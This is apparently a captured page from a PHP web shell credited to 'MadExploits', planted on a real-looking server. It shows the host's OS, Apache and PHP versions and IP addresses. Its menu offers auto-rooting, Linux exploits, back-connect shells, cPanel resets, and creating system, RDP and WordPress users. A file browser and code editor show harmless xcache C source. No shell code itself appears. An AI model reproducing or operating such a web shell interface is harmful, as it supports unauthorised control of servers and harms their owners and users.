Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
util /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
README
49
B
-rw-rw-r--
xc_align.h
445
B
-rw-rw-r--
xc_foreachcoresig.h
589
B
-rw-rw-r--
xc_stack.c
1.12
KB
-rw-rw-r--
xc_stack.h
507
B
-rw-rw-r--
xc_stack.lo
312
B
-rw-r--r--
xc_trace.c
619
B
-rw-rw-r--
xc_trace.h
1.25
KB
-rw-rw-r--
xc_trace.lo
312
B
-rw-r--r--
xc_vector.h
1.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xc_trace.c
#ifdef TEST # define PHP_DIR_SEPARATOR '/' #else # include "php.h" #endif #include "xc_trace.h" #include <stdio.h> #include <stdarg.h> #include <string.h> const char *xc_trace_get_basename(const char *path) /* {{{ */ { const char *last_separator = strrchr(path, PHP_DIR_SEPARATOR); return last_separator ? last_separator + 1 : path; } /* }}} */ int xc_vtrace(const char *fmt, va_list args) /* {{{ */ { return vfprintf(stderr, fmt, args); } /* }}} */ int xc_trace(const char *fmt, ...) /* {{{ */ { va_list args; int ret; va_start(args, fmt); ret = xc_vtrace(fmt, args); va_end(args); return ret; } /* }}} */
Close